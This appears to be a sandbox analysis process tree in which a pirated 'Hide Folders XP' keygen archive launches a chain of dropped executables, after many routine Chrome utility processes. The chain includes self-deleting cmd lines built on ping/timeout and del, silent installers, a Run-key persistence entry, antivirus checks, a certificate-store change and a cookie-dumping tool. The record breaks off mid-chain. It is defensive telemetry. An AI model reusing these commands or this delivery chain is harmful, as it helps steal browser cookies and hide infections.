"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5224 /prefetch:8
2⤵
PID:4416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5356 /prefetch:8
2⤵
PID:4500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
2⤵
PID:4224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:8
2⤵
PID:4644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8
2⤵
PID:1844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
2⤵
PID:4812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:8
2⤵
PID:4844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:8
2⤵
PID:4872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3656 /prefetch:8
2⤵
PID:2400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:8
2⤵
PID:4988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
2⤵
PID:4936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3708 /prefetch:8
2⤵
PID:5008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5192 /prefetch:8
2⤵
PID:5060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8
2⤵
PID:3980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:8
2⤵
PID:1956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:8
2⤵
PID:2312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5372 /prefetch:8
2⤵
PID:3820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:8
2⤵
PID:4248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4712 /prefetch:8
2⤵
PID:1404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1324 /prefetch:1
2⤵
PID:4292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:8
2⤵
PID:4256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:8
2⤵
PID:4372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:8
2⤵
PID:4368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4984 /prefetch:8
2⤵
PID:3444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2060 /prefetch:8
2⤵
PID:4780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4908 /prefetch:8
2⤵
PID:4824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
2⤵
PID:4896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4492 /prefetch:8
2⤵
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
2⤵
PID:4984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3492 /prefetch:8
2⤵
PID:4976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5212 /prefetch:8
2⤵
PID:4932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8
2⤵
PID:4964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:8
2⤵
PID:4264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
2⤵
PID:2452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:8
2⤵
PID:4124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5176 /prefetch:8
2⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4220 /prefetch:8
2⤵
PID:4516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:8
2⤵
PID:5012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3660 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3616 /prefetch:8
2⤵
PID:4900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4428 /prefetch:8
2⤵
PID:4772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:8
2⤵
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2276 /prefetch:1
2⤵
PID:4992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4756 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2028 /prefetch:8
2⤵
PID:5008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5468 /prefetch:8
2⤵
PID:1404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:8
2⤵
PID:4376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3668 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1520 /prefetch:8
2⤵
PID:588

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4588

C:\Users\Admin\AppData\Local\Temp\Temp2_Hide_Folders_XP_2_2_Build_2_2_keygen.zip\Hide_Folders_XP_2_2_Build_2_2_keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_Hide_Folders_XP_2_2_Build_2_2_keygen.zip\Hide_Folders_XP_2_2_Build_2_2_keygen.exe"
1⤵
PID:4516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:3664

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:2472

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:5044

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2332

C:\Users\Admin\AppData\Roaming\8086.tmp.exe
"C:\Users\Admin\AppData\Roaming\8086.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3760

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\8086.tmp.exe"
5⤵
PID:2800

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:4120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
4⤵
PID:3996

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4344

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:4448

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:3068

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4332

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:4940

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Users\Admin\AppData\Local\Temp\A4H7JJUJTJ\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\A4H7JJUJTJ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4112

C:\Users\Admin\AppData\Local\Temp\A4H7JJUJTJ\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\A4H7JJUJTJ\multitimer.exe" 1 3.1617022316.6061cd6c859f3 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4700

C:\Users\Admin\AppData\Local\Temp\A4H7JJUJTJ\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\A4H7JJUJTJ\multitimer.exe" 2 3.1617022316.6061cd6c859f3
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008

C:\Users\Admin\AppData\Local\Temp\uujqragscrx\4gh4eaihjg3.exe
"C:\Users\Admin\AppData\Local\Temp\uujqragscrx\4gh4eaihjg3.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:2356

C:\Users\Admin\AppData\Local\Temp\is-V979G.tmp\4gh4eaihjg3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V979G.tmp\4gh4eaihjg3.tmp" /SL5="$600C8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\uujqragscrx\4gh4eaihjg3.exe" /VERYSILENT
9⤵
- Executes dropped EXE
PID:3392

C:\Users\Admin\AppData\Local\Temp\is-URNBU.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-URNBU.tmp\winlthsth.exe"
10⤵
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 660
11⤵
- Program crash
PID:5136

C:\Users\Admin\AppData\Local\Temp\tms3fxkqrvi\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\tms3fxkqrvi\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
PID:2024

C:\Users\Admin\AppData\Local\Temp\is-JJSF5.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JJSF5.tmp\Setup3310.tmp" /SL5="$401BA,138429,56832,C:\Users\Admin\AppData\Local\Temp\tms3fxkqrvi\Setup3310.exe" /Verysilent /subid=577
9⤵
- Executes dropped EXE
PID:3944

C:\Users\Admin\AppData\Local\Temp\is-VJ527.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VJ527.tmp\Setup.exe" /Verysilent
10⤵
PID:5840

C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"
11⤵
PID:5328

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:6972

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:7000

C:\Program Files (x86)\VR\Versium Research\UgEwD2Otfx9I.exe
"C:\Program Files (x86)\VR\Versium Research\UgEwD2Otfx9I.exe"
11⤵
PID:6136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
12⤵
PID:6588

C:\Program Files (x86)\VR\Versium Research\22.exe
"C:\Program Files (x86)\VR\Versium Research\22.exe"
11⤵
PID:5564

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
12⤵
PID:6700

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
13⤵
PID:7160

C:\Program Files (x86)\VR\Versium Research\RmSetp.exe
"C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"
11⤵
PID:5552

C:\ProgramData\2418488.exe
"C:\ProgramData\2418488.exe"
12⤵
PID:7148

C:\ProgramData\3673687.exe
"C:\ProgramData\3673687.exe"
12⤵
PID:6916

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
13⤵
PID:6988

C:\Program Files (x86)\VR\Versium Research\lylal220.exe
"C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
11⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\is-669GN.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-669GN.tmp\lylal220.tmp" /SL5="$3046E,491750,408064,C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
12⤵
PID:5084

C:\Users\Admin\AppData\Local\Temp\is-E1T2U.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-E1T2U.tmp\Microsoft.exe" /S /UID=lylal220
13⤵
PID:6796

C:\Program Files\Windows Photo Viewer\KNNEQONWER\irecord.exe
"C:\Program Files\Windows Photo Viewer\KNNEQONWER\irecord.exe" /VERYSILENT
14⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\is-GM6AE.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GM6AE.tmp\irecord.tmp" /SL5="$40380,6265333,408064,C:\Program Files\Windows Photo Viewer\KNNEQONWER\irecord.exe" /VERYSILENT
15⤵
PID:3308

C:\Users\Admin\AppData\Local\Temp\1c-f358f-5c7-71d88-2b929d2f5ff5c\Bihidadavi.exe
"C:\Users\Admin\AppData\Local\Temp\1c-f358f-5c7-71d88-2b929d2f5ff5c\Bihidadavi.exe"
14⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\6b-7dc55-f2b-87682-a7d2366fb0dbf\Bykyxaevoli.exe
"C:\Users\Admin\AppData\Local\Temp\6b-7dc55-f2b-87682-a7d2366fb0dbf\Bykyxaevoli.exe"
14⤵
PID:3480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yibh3qpw.syb\gaooo.exe & exit
15⤵
PID:384

C:\Users\Admin\AppData\Local\Temp\yibh3qpw.syb\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\yibh3qpw.syb\gaooo.exe
16⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:7700

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:3120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5zy3rhtt.rte\md7_7dfj.exe & exit
15⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\5zy3rhtt.rte\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\5zy3rhtt.rte\md7_7dfj.exe
16⤵
PID:5696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kih5cj20.vgc\askinstall31.exe & exit
15⤵
PID:6464

C:\Users\Admin\AppData\Local\Temp\kih5cj20.vgc\askinstall31.exe
